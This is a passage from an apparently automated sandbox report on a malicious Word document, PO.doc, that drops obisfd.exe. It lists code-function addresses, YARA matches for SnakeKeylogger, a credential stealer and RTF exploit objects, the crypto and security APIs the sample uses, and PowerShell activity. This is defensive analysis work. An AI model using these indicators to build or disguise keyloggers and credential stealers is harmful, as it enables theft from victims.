                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F5BD07_2_004F5BD0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FD3E87_2_004FD3E8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F5BE07_2_004F5BE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FEBE07_2_004FEBE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FD3F87_2_004FD3F8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F0DF87_2_004F0DF8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F7BF87_2_004F7BF8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FDD887_2_004FDD88
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F49807_2_004F4980
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F699A7_2_004F699A
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F29987_2_004F2998
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FC5907_2_004FC590
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F3BA97_2_004F3BA9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F69A87_2_004F69A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FADA87_2_004FADA8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FC5A07_2_004FC5A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F3BB87_2_004F3BB8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FADB87_2_004FADB8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069A1207_2_0069A120
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069C0607_2_0069C060
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069F2607_2_0069F260
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069D6407_2_0069D640
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069A4407_2_0069A440
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006900407_2_00690040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006918287_2_00691828
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069BA207_2_0069BA20
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069EC207_2_0069EC20
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069D0007_2_0069D000
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006900067_2_00690006
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006930107_2_00693010
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069CCE07_2_0069CCE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006904F87_2_006904F8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00691CF07_2_00691CF0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069E2C07_2_0069E2C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069B0C07_2_0069B0C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006934D87_2_006934D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069C6A07_2_0069C6A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069F8A07_2_0069F8A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069AA807_2_0069AA80
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006926807_2_00692680
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069DC807_2_0069DC80
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00690E877_2_00690E87
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00690E987_2_00690E98
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069A7607_2_0069A760
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006913607_2_00691360
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069D9607_2_0069D960
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00692B487_2_00692B48
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069BD407_2_0069BD40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069EF407_2_0069EF40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069A7507_2_0069A750
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069D3207_2_0069D320
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006905087_2_00690508
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069B7007_2_0069B700
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069E9007_2_0069E900
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069E5E07_2_0069E5E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069B3E07_2_0069B3E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069C9C07_2_0069C9C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069FBC07_2_0069FBC0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006909C27_2_006909C2
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006909D07_2_006909D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069ADA07_2_0069ADA0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006939A07_2_006939A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069DFA07_2_0069DFA0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006921B87_2_006921B8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069C3807_2_0069C380
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0069F5807_2_0069F580
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B00407_2_006B0040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B68E87_2_006B68E8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BAA687_2_006BAA68
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B3D687_2_006B3D68
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BC4687_2_006BC468
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BB7607_2_006BB760
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B3D787_2_006B3D78
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BC4787_2_006BC478
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BE9787_2_006BE978
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B57787_2_006B5778
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BDE787_2_006BDE78
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BB7707_2_006BB770
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B30707_2_006B3070
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B4A707_2_006B4A70
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B7A487_2_006B7A48
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B94487_2_006B9448
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BF7407_2_006BF740
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B6D407_2_006B6D40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B87407_2_006B8740
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BAA597_2_006BAA59
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B94587_2_006B9458
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B305F7_2_006B305F
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B87507_2_006B8750
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BCD287_2_006BCD28
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B46287_2_006B4628
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B60287_2_006B6028
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BC0207_2_006BC020
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B39207_2_006B3920
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B53207_2_006B5320
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B60387_2_006B6038
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B7A3E7_2_006B7A3E
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B53307_2_006B5330
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BDA307_2_006BDA30
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B6D307_2_006B6D30
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BF7307_2_006BF730
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B9D087_2_006B9D08
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BB3087_2_006BB308
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B90007_2_006B9000
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B00067_2_006B0006
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B461A7_2_006B461A
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BB3187_2_006BB318
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BEE107_2_006BEE10
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B39107_2_006B3910
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BC0107_2_006BC010
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B68E27_2_006B68E2
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B5BE07_2_006B5BE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BE4E07_2_006BE4E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B82F87_2_006B82F8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B75F07_2_006B75F0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B8FF07_2_006B8FF0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B82F67_2_006B82F6
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B2AC97_2_006B2AC9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BBBC87_2_006BBBC8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B34C87_2_006B34C8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B4ECE7_2_006B4ECE
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BC8C17_2_006BC8C1
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BAEC07_2_006BAEC0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B41C07_2_006B41C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B4ED87_2_006B4ED8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BD5D87_2_006BD5D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BFBD87_2_006BFBD8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B5BD27_2_006B5BD2
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BC8D07_2_006BC8D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B41D07_2_006B41D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BF2A87_2_006BF2A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B8BA87_2_006B8BA8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B98A27_2_006B98A2
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B7EA07_2_006B7EA0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B34B97_2_006B34B9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BBBB87_2_006BBBB8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B98B07_2_006B98B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BAEB07_2_006BAEB0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B57887_2_006B5788
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BDE887_2_006BDE88
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B71887_2_006B7188
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006BD1807_2_006BD180
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B4A807_2_006B4A80
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B64807_2_006B6480
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B71987_2_006B7198
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B8B987_2_006B8B98
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B7E9E7_2_006B7E9E
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006B64907_2_006B6490
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E2E787_2_006E2E78
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E00407_2_006E0040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E35587_2_006E3558
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E3C387_2_006E3C38
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E43187_2_006E4318
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E49F87_2_006E49F8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E50D87_2_006E50D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E57B87_2_006E57B8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E2E687_2_006E2E68
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E354A7_2_006E354A
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E3C287_2_006E3C28
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E21217_2_006E2121
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E21307_2_006E2130
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E43087_2_006E4308
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E2B007_2_006E2B00
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E49E97_2_006E49E9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E2AF97_2_006E2AF9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E50C87_2_006E50C8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E0ED87_2_006E0ED8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_006E57A87_2_006E57A8
                Source: PO.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: obisfd.exe PID: 3544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: obisfd.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6FfzLi8FyhIIqWu[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: obisfd.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, CTFYYSwldjLLtdLFTJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, CTFYYSwldjLLtdLFTJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, V9JX8gvNK4hEI9Xqap.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, CTFYYSwldjLLtdLFTJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@29/8
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO.docJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF87.tmpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<.......x........!.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<.......x........!.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<.......x.......5!.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<.......x.......B!.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<.......x.......V!.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<.......x.......b!.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......4.......<................!.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<................!.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........!.........................s............X....... .......................Jump to behavior
